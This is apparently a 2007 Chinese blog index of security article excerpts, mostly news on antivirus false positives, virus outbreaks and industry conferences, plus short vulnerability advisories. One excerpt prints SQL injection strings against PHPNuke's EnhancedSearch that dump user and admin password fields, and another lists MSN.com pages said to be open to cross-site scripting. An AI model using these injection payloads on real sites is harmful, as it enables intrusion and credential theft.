网络新闻
smartsky
这个作者很懒,什么都没留下…
展开
-
FlashFXP PWD命令超长畸形参数溢出漏洞
受影响系统: FlashFXP FlashFXP 3.4.0 build 1145 描述: FlashFXP是一款流行的FTP客户端。 FlashFXP在处理畸形的命令请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞导致客户端失去响应能力。 如果向FlashFXP所发送的PWD命令包含有多于5420个“ /”且被至少一个不同的字符分隔开的话,就会导致应用程原创 2007-02-10 13:28:00 · 966 阅读 · 0 评论 -
诺顿误杀事件造成“疑似病毒大爆发”恐慌
昨天,上海大量单位电脑用户陷入“疑似病毒大爆发”的恐慌中――― 屏幕反复弹出“病毒报告”窗口,显示一种“后门病毒”(Backdoor)正在侵入。一旦重新启动,电脑便出现蓝屏,显示“硬件出错”字样;最重受害者,电脑自动地一再重启,无法停下。类似症状在众多商务楼中出现,甚至部分银行单位也是如此,全国范围内都有发现,以至于国家计算机病毒应急处理中心当天紧急发布通报。这一切竟都是一款全球知名杀毒软件转载 2007-05-20 10:31:00 · 815 阅读 · 0 评论 -
带毒网页成互联网公害 Google、江民积极应对
近日,搜索巨头Google公布的一组调查数据显示,10%的网页含有恶意代码。Google调研人员从全球数以十亿计的网站中抽取的450万个网页的分析测试中发现,至少有45万个页面中含有恶意脚本,即平均每十个搜寻结果里,就有一个含有可能会破坏用户电脑的隐藏性恶意程序。而这还只是一个保守的估计,另外还有70万个网页被视为可疑页面。为此,Google正在考虑在有害页面上加入“这网站有可能损害你的计算机”的原创 2007-05-17 12:29:00 · 1712 阅读 · 0 评论 -
PHPNuke所有版本EnhancedSearch文件存在注入漏洞
SQL Injection : EnhancedSearch%) UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* EnhancedSearch%) UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/* EnhancedSear转载 2007-05-16 12:26:00 · 747 阅读 · 0 评论 -
MSN.com上的跨站漏洞
漏洞页 http://support.msn.com/networkstatus.aspx? http://support.msn.com/default.aspx? http://feedback.msn.com/default.aspx? http://feedback.msn.com/eform.aspx?http://support.msn.com/networkstatus.as转载 2007-05-16 12:27:00 · 737 阅读 · 0 评论 -
不惧黑客!微软邀请参加Blue Hat安全会议
微软再度邀请黑客社区的成员参加Blue Hat安全会议,以指出软件巨头微软哪里有错。 周四,微软的Blue Hat会议正式召开,会议主要围绕移动安全、硬件破解、微软安全工具和地下隐患交易市场等方面展开。微软两年前开始举办此会议,并把它作为微软安全团队与外界安全研究人员对话的途径。 会议之所以取名Blue H原创 2007-05-12 18:19:00 · 617 阅读 · 0 评论 -
2007年度十大安全威胁名单
近日,迈克菲公司 (NYSE: MFE)再次调查并发布了2007年度十大安全威胁预测。据McAfee Avert Labs 调查显示:密码窃取网络钓鱼网站等威胁如预期一样盛行。然而,遥控式傀儡程序等其它威胁却出乎意料地有所减少。 McAfee Avert Labs 和产品开发部高级副总裁 Jeff Green 表示:“正值我们步入年中之际,我们有必要检查我们年初对未来预测的走向如何。正如预原创 2007-06-26 12:19:00 · 896 阅读 · 0 评论 -
“AV终结者”比熊猫烧香作者更“聪明”?
近日,令广大电脑用户深受其害的“AV终结者”病毒破坏势头依旧很猛,波及用户数量已经多达10万。经过对近段时间“AV终结者”病毒传播特点以及危害程度的分析,金山毒霸反病毒专家戴光剑推测,在“AV终结者”病毒的背后极有可能隐藏着一个巨大的集团化运做链条,而链条的第一步就是人为纵毒。 金山毒霸反病毒专家戴光剑表示,“AV终结者”的种种表现以及传播和作案手段都显示出其背后集团化、企业化运作的痕迹。为此转载 2007-06-20 13:18:00 · 1086 阅读 · 0 评论 -
阿里巴巴支付宝远程代码执行漏洞-0DAY
阿里巴巴支付宝远程代码执行漏洞by cocoruder(frankruder_at_hotmail.com)http://ruder.cdut.netSummary:支付宝是由阿里巴巴公司出品的在线支付解决方案,在中国拥有众多用户,更多信息请参考:https://www.alipay.com在支付宝密码输入控件中存在一个远程代码执行漏洞,远程攻击者可利用此漏洞在被攻击者系统上执原创 2007-02-09 13:21:00 · 1580 阅读 · 0 评论 -
熊猫烧香集体"自杀"新变种情人节爆发威胁大增
金山毒霸反病毒中心最新消息:熊猫烧香变身"金猪"后,病毒肆虐数日之后,于2月6日凌晨,出现集体"自杀"现象--熊猫烧香新变种(Worm.WhBoy.cw)正在大规模"残杀"旧变种。 据悉,该熊猫烧香变种的传播性和感染性是已有熊猫烧香变种的10倍,极有可能在两节期间大规模爆发,用户必须高度警惕。 金山毒霸反病毒专家戴光剑介绍,该"熊猫烧香"变种,不但能感染系统中可执行文件与网页文件,而且能够结束原创 2007-02-08 18:47:00 · 1225 阅读 · 0 评论 -
第一个跨平台OpenOffice.org病毒出现
根据APCmag报道, 第一个跨平台OpenOffice.org病毒 — “SB/Badbunny-A” — 被病毒开发者直接通过电邮送到Sophos 。这个概念性病毒能通过不同的方法感染Windows, Mac OS X和Linux,但这个病毒还未在普通用户中流传。尽管SUN公司的开发人员Malte Timmermann 提出了相反的见解,但是这种嵌入式脚本攻击病毒已经预示人们OpenOff转载 2007-05-26 12:55:00 · 746 阅读 · 0 评论